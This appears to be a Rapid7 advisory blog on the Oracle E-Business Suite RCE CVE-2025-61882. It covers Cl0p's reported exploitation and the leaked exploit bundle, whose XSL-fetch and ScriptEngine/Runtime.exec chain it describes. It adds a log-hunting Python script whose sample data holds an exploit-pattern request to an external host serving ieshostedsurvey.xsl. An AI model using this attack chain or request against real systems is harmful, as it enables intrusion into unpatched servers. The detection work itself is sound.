Overview
On Saturday, October 4, 2025, Oracle published an advisory and accompanying patch for CVE-2025-61882. This new vulnerability affects the Oracle Concurrent Processing product within Oracle E-Business Suite (EBS), and has a CVSS score of 9.8 Critical. Per the vendor advisory, the vulnerability allows for unauthenticated remote code execution (RCE) against a target system.
Based on information published on LinkedIn by Mandiant at Google Cloud, this new vulnerability is claimed to have been exploited in-the-wild as a zero-day vulnerability by the Cl0p ransomware gang, circa August 2025. Additionally, the vendor advisory has listed several Indicators of Compromise (IOC) from observed exploitation. Included in the IOCs are several file hashes for a suspected leaked exploit script. It is currently unknown if the leaked exploit script is viable, and whether it leverages CVE-2025-61882 or an older n-day vulnerability. Rapid7 Labs is currently investigating this and we will update this blog when more information is available.
As of early Monday, October 6, 2025, several government bodies have begun to issue emergency alerts, such as the National Cyber Security Centre (NCSC) in the UK and the Cyber Security Agency (CSA) in Singapore.
The Cl0p ransomware gang is known to leverage zero-day exploits when targeting victims. In 2023, Cl0p exploited CVE-2023-34362 as a zero-day against organizations running a file transfer product called MOVEit, in a widespread ransomware campaign. Separately, and unrelated at that time, Oracle E-Business Suite was also exploited in-the-wild via CVE-2022-21587, by an unknown threat actor. Given the history of both this product and the Cl0p ransomware gang, customers of affected Oracle E-Business Suite instances must take urgent action. With the leaking of suspected exploit code, broad exploitation by multiple threat actors is highly likely to begin.
Update: On October 6, 2025, CVE-2025-61882 was added to the U.S. Cybersecurity and Infrastructure Security Agency’s (CISA) list of known exploited vulnerabilities (KEV), and confirmed to be used in a ransomware campaign.
The leaked exploit
In early October 2025, the threat actor collective operating as “SCATTERED LAPSUS$”, Shiny Hunters, or other naming variants publicly released a small exploit bundle alongside an extortion campaign tied to a wide-ranging compromise of Oracle E-Business Suite customers. The exploit bundle was released on their Telegram channel:

The bundle contained three files:
- exp.py - MD5: b296d3b3115762096286f225696a9bb1
- readme.md - MD5: e278700f827590c1dff9e24116bde4da
- server.py - MD5: 23094d64721a279c0ce637584b87d6f1
The readme.md file contains instructions on how to set up and run the scripts to exploit the vulnerability.
The beginning of the file starts with the following strings:
# SCATTERED LAPSUS$ [RETARD-CL0P] HUNTERS
# SCATTERED LAPSUS$ [RETARD-CL0P] HUNTERS
CL0P you are now REPORTED to the RFJ with your FULL Dox we have ur LOCATION U WILL BE DRONE STRIKED
This hints at a feud between the two groups: the “Scattered LAPSUS$” collective is calling out Cl0p over its extortion of Oracle EBS data, and to emphasize this, an example of the extortion message was posted in the same Telegram channel:

From an initial analysis of the scripts, here are some findings:
server.py serves an XSL stylesheet whose template decodes an embedded Base64 JavaScript string and then invokes Java’s javax.script.ScriptEngine from inside the XSLT environment to eval() that string; the decoded string constructs and calls java.lang.Runtime.getRuntime().exec(...).
In short: attacker-hosted XSL, the XSLT engine creates a ScriptEngine, the JS string is eval’d and the Java Runtime.exec runs an OS command.
exp.py abuses EBS configuration endpoints (the UiServlet / configurator flow) to get EBS to request the attacker-controlled XSL file (it constructs an encoded return_url / XML UI definition payload that points to .../ieshostedsurvey.xsl).
Once EBS fetches the XSL, the server-side XSLT evaluation performs the ScriptEngine flow described above and results in a spawned process on the EBS host.
Mitigation guidance
A vendor supplied update is available to remediate CVE-2025-61882. Customers of affected Oracle E-Business Suite instances are advised to update to the latest version of Oracle E-Business Suite on an emergency basis. The following versions are affected:
- Oracle E-Business Suite, versions 12.2.3 through to, and including, version 12.2.14.
The vulnerability is in the “Oracle Concurrent Processing” product within Oracle E-Business Suite. Notably, the vendor states that the Oracle October 2023 Critical Patch Update must first be applied before further updates.
Given that exploitation in-the-wild may have occurred since August 2025, customers whose affected Oracle E-Business Suite instances are accessible via the internet should conduct suitable threat hunting to detect any potential malicious activity.
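The delivery pattern described in the exploit analysis above (a UiServlet / configurator request carrying an encoded return_url that points the server at an external .xsl) gives threat hunters a concrete thing to search for in EBS web-tier access logs. The following is an added example written for this post, not code from Rapid7, Oracle or the leaked bundle; the log layout, the KNOWN_HOSTS values and the sample log lines are constructed, so adjust them to your own deployment.

```python
import re
from urllib.parse import parse_qs, unquote, urlparse

# Hostnames EBS may legitimately be told to return to (hypothetical values;
# replace with the hostnames of your own EBS web tier).
KNOWN_HOSTS = {"ebs.example.internal", "apps.example.internal"}
SUSPECT_PATHS = ("uiservlet", "configurator")  # request flow abused by the exploit
# Common/combined access-log layout: client - user [time] "METHOD target proto" status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" \d{3}')

def fully_unquote(value, max_rounds=3):
    """Undo repeated percent-encoding; the payload sends return_url encoded."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def inspect_request(target):
    """Return the reasons a request matches the XSL-fetch pattern ([] if none)."""
    parsed = urlparse(target)
    if not any(frag in parsed.path.lower() for frag in SUSPECT_PATHS):
        return []
    reasons = []
    for key, values in parse_qs(parsed.query, keep_blank_values=True).items():
        if key.lower() != "return_url":
            continue
        for raw in values:  # parse_qs already removed one layer of encoding
            ref = urlparse(fully_unquote(raw))
            if ref.hostname and ref.hostname.lower() not in KNOWN_HOSTS:
                reasons.append(f"return_url points at external host {ref.hostname}")
            if ref.path.lower().endswith(".xsl"):
                reasons.append("return_url names an .xsl stylesheet")
    return reasons

def hunt(lines):
    """Return (client_ip, request_target, reasons) for each suspicious log line."""
    hits = []
    for line in lines:
        match = LOG_RE.match(line)
        if match and (reasons := inspect_request(match["target"])):
            hits.append((match["ip"], match["target"], reasons))
    return hits

# Constructed sample lines: a login, a benign configurator hit, and the exploit
# pattern (double-encoded return_url to an external host serving ieshostedsurvey.xsl).
SAMPLE_LOG = [
    '10.0.0.5 - - [03/Oct/2025:10:00:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 512',
    '10.0.0.7 - - [03/Oct/2025:10:01:12 +0000] "POST /OA_HTML/configurator/UiServlet'
    '?return_url=https%3A%2F%2Febs.example.internal%2FOA_HTML%2FRF.jsp HTTP/1.1" 200 2048',
    '203.0.113.9 - - [03/Oct/2025:10:02:33 +0000] "POST /OA_HTML/configurator/UiServlet'
    '?return_url=https%253A%252F%252F198.51.100.20%252Fieshostedsurvey.xsl HTTP/1.1" 200 1024',
]
```

Feed `hunt()` your real access-log lines and triage each hit; a return_url that leaves your own hostnames, or that names any stylesheet, is worth pulling the full request and the server's subsequent outbound connections for.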
For the latest mitigation guidance, please refer to the vendor security advisory.
Rapid7 customers
InsightVM and Nexpose
InsightVM and Nexpose customers can assess their exposure to CVE-2025-61882 with an authenticated vulnerability check which is now available in today’s (October 6) content release.
Intelligence Hub
Customers leveraging Rapid7’s Intelligence Hub can track the latest developments surrounding CVE-2025-61882.
Updates
- October 6, 2025: Added section for InsightVM and Nexpose, under Rapid7 customers.
- October 6, 2025: Updated section for InsightVM and Nexpose to confirm that authenticated vulnerability check has shipped.
- October 7, 2025: Updated Overview to add a reference to the CISA KEV list.